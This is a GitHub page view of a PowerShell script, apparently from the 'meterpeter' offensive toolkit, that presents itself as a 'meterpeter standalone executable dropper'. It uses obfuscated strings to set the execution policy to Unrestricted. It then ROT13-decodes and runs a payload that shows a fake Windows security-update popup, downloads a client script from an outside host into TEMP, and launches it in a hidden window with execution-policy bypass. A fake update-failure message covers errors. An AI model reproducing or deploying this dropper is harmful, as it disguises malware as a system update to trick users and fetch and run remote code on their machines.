-
Notifications
You must be signed in to change notification settings - Fork 104
/
Copy pathupdate.ps1
29 lines (23 loc) · 2.41 KB
/
update.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<#
.SYNOPSIS
Author: @r00t-3xp10it
Credits to: @Markus_Fleschut (rot13)
meterpeter standalone executable dropper
Change_For_Silent_Exec: [fgevat]`$FvyragRkrp=`"Gehr`"
#>
$linkinfodll = "@Se£@t-£E@xe£c@ut£i@on£P@o£li@c£y @U£nR@e£st@ric£t@e£d" -replace '(@|£)',''
cmd /R echo Y|Powershell $linkinfodll -Scope CurrentUser|Out-Null
$Rotten13 = @("[PzqyrgOvaqvat(CbfvgvbanyOvaqvat=`$snyfr)] cnenz(
[fgevat]`$BhgSvyr=`"`$Rai:GZC\Hcqngr-XO5005101.cf1`",
[fgevat]`$FvyragRkrp=`"Snyfr`"
)
`$FRkrphgrq = `$ahyy
`$ReebeNpgvbaCersrerapr = `"FvyragylPbagvahr`"
Vs(`$FvyragRkrp -vrd `"Snyfr`"){`$HfreFrgGvatf = cbjrefuryy (Arj-Bowrpg -PbzBowrpg Jfpevcg.Furyy).Cbchc(`" Srngher hcqngr `a`aGUVF FBSGJNER VF CEBIVQRQ OL GUR ERTRAGF NAQ PBAGEVOHGBEF ``NF VF'' NAQ NAL RKCERFF BE VZCYVRQ JNEENAGVRF, VAPYHQVAT, OHG ABG YVZVGRQ GB GUR VZCYVRQ JNEENAGVRF BS ZREPUNAGNOVYVGL NAQ SVGARFF SBE N CNEGVPHYNE CHECBFR NER QVFPYNVZRQ. VA AB RIRAG FUNYY GUR ERTRAGF BE PBAGEVOHGBEF OR YVNOYR SBE NAL QVERPG, VAQVERPG, VAPVQRAGNY, FCRPVNY, RKRZCYNEL, BE PBAFRDHRAGVNY QNZNTRF (VAPYHQVAT, OHG ABG YVZVGRQ GB, CEBPHERZRAG BS FHOFGVGHGR TBBQF BE FREIVPRF; YBFF BS HFR, QNGN, BE CEBSVGF; BE OHFVARFF VAGREEHCGVBA) UBJRIRE PNHFRQ NAQ BA NAL GURBEL BS YVNOVYVGL, JURGURE VA PBAGENPG, FGEVPG YVNOVYVGL, BE GBEG (VAPYHQVAT ARTYVTRAPR BE BGUREJVFR) NEVFVAT VA NAL JNL BHG BS GUR HFR BS GUVF FBSGJNER, RIRA VS NQIVFRQ BS GUR CBFFVOVYVGL BS FHPU QNZNTR.`",6,`" Frpher XO4569132 Hcqngr`",1+0)}
vje -Hev `"uggc://CharlieBrown/Hcqngr-XO5005101.cf1`" -BhgSvyr `"`$BhgSvyr`" -HfreNtrag `"Zbmvyyn/5.0 (Naqebvq; Zbovyr; ei:40.0) Trpxb/40.0 Sversbk/40.0`"|Bhg-Ahyy
Fgneg-Fyrrc -Zvyyvfrpbaqf 300;`$n = Trg-Qngr
gel{#Rkrphgr zrgrecrgre pyvrag.cf1 va n puvyq cebprff qrgnpu sebz cnerag cebprff (onpxtebhaq)
Fgneg-Cebprff cbjrefuryy.rkr -JvaqbjFglyr Uvqqra -NethzragYvfg `"-rkrp olcnff -Svyr `$BhgSvyr`"|Bhg-Ahyy
}pngpu{}");$rdata = $null
$Rotten13.ToCharArray() | ForEach-Object {If((([int] $_ -ge 97) -and ([int] $_ -le 109)) -or (([int] $_ -ge 65) -and ([int] $_ -le 77))){$rdata += [char] ([int] $_ + 13)}ElseIf((([int] $_ -ge 110) -and ([int] $_ -le 122)) -or (([int] $_ -ge 78) -and ([int] $_ -le 90))){$rdata += [char] ([int] $_ - 13)}Else{$rdata += $_}}
try{echo "$rdata"|&(DIR Alias:/I*X)}catch{powershell (New-Object -ComObject Wscript.Shell).Popup("Fail to execute KB5005101.exe Update Package",5," KB5005101 Security Update",0+16)}